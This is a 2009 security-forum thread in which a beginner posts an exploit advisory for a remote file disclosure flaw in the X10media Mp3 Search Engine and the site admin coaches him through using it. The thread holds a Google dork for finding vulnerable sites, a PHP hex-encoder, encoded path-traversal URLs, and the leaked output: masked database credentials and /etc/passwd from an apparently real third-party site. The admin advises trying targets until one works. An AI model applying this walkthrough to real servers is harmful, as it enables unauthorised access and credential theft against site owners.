Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
May 23, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 472
Members: 0
Total: 472
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> Help the noob with "art of exploiting" xD
Post new topic  Reply to topic View previous topic :: View next topic 
Help the noob with "art of exploiting" xD
PostPosted: Mon May 18, 2009 8:57 pm Reply with quote
Arxi
Beginner
Beginner
 
Joined: May 18, 2009
Posts: 3




Hello guys. I found this forum to be very supportove for newbs in exploiting.

Here is expoloit from x10media script. with insrtuctions. I don't get first part where i should encode URL. I runed script in cmd and all i get is "text copy" and nothing else. I am realy noob with exploits and i need help with this =)

Few questions: Should i keep site opened when running this php script?
i am doing right if I type in cmd >"php folder" then php expoit.php ?

I still have lot of questions but i will save it for later xD

SCRIPT AND INTRC:

################# ~THUNDER ################################################################


~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability

~Founded by : THUNDER <t4h[at]hotmail.fr>
~Dork: "This search engine is in no way intended for illegal downloads. "
~File : Download.php

================================================================================
===========

to read files you need to encode the url, so you can use this php code :
<?
//Encode URL ** THUNDER **
function enc($string){
$hex='';
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
$thunder = $_GET[t];
echo enc($thunder);
?>

How to use : http://127.0.0.1/encode.php?t=[Url]
Ex : http://127.0.0.1/encode.php?t=includes/constants.php

##### ~Exploit ############################################################################


http://www.target.com/[path]/download.php?url=[Encoded url]

Example :
let's download the constants.php file wich contains the database login and password .
the file will be downloaded as .mp3 exstension .

http://www.target.com/[path]/download.php?url=696e636c756465732f636f6e7374616e74732e706870

Open the downloaded file with any text editor... ,and you got the database .



################################################################################
###########

Hope you can help me =)
View user's profile Send private message MSN Messenger
PostPosted: Tue May 19, 2009 11:55 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




First of all, you must search exploitable target. Use Google dork:

http://www.google.ee/search?hl=et&q=%22This+search+engine+is+in+no+way+intended+for+illegal+downloads.+%22&btnG=Google+otsing&lr=&aq=f&oq=

And try example from exploit against targets till you find working one.

http://www.p****d.com/download.php?url=696e636c756465732f636f6e7374616e74732e706870

Download that file and look inside - you can see database credentials:

Code:

/**
 * Database Constants - these constants are required
 * in order for there to be a successful connection
 * to the MySQL database. Make sure the information is
 * correct.
 */
define("DB_SERVER", "mysql.***com");
define("DB_USER", "p***d");
define("DB_PASS", "V***9");
define("DB_NAME", "p***");
define("DB_LINK", "db_link");


Now, you can dowload orther files too. Let's try "/etc/passwd".
Open encoder:

http://www.waraxe.us/sql-char-encoder.html

enter "../../../../../../../../../../etc/passwd" and hit "Encode now!".

Look for "MySql hex-encoded string":

Code:

0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764


and just delete first two chars, so that you will get this:

Code:

2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764


Then use it in exploit:

http://www.p******d.com/download.php?url=2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764

And you get what expected:

Code:

daemon:x:1:1:Owner of many system processes:/:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/false
man:x:6:100:man:/var/cache/man:/bin/false
...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 19, 2009 12:26 pm Reply with quote
Arxi
Beginner
Beginner
 
Joined: May 18, 2009
Posts: 3




Preety nice wroten but i STILL dont get how to encode Url Embarassed

Here is what i done:

I run my xampp
I type http://localhost/encode.php?t=http://www.****.com/ (www.****.com is my target)
And i don't get nothing.

I know i am quite boring but if some1 have a few mins please help me
View user's profile Send private message MSN Messenger
PostPosted: Tue May 19, 2009 4:05 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Arxi wrote:
Preety nice wroten but i STILL dont get how to encode Url Embarassed

Here is what i done:

I run my xampp
I type http://localhost/encode.php?t=http://www.****.com/ (www.****.com is my target)
And i don't get nothing.

I know i am quite boring but if some1 have a few mins please help me


You got it all wrong Smile

This security vulnerability can be exploited manually. You only need web browser. That encoding script - it's just additional, optional utility. You can encode with that script, manually with ascii table or with sql encoder, as I did show before.
And you have to encode path of the file, you want to download, not website's url!
By the way it seems that you have not clue even about this exploit possibilities. It's remote file disclosure exploit, right? It will allow you to see, what's inside of files residing in target server. This type of exploit can reveal potentially sensitive information, but usually more steps are needed for effective attack.

And one more thing - don't post sensitive info here! That includes target urls!
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 19, 2009 4:33 pm Reply with quote
Arxi
Beginner
Beginner
 
Joined: May 18, 2009
Posts: 3




Gosh i just found hard truth Crying or Very sad

I don't even know what this script does.
Anyway txs for mins you spared to help me
View user's profile Send private message MSN Messenger
Help the noob with "art of exploiting" xD
  www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.154 Seconds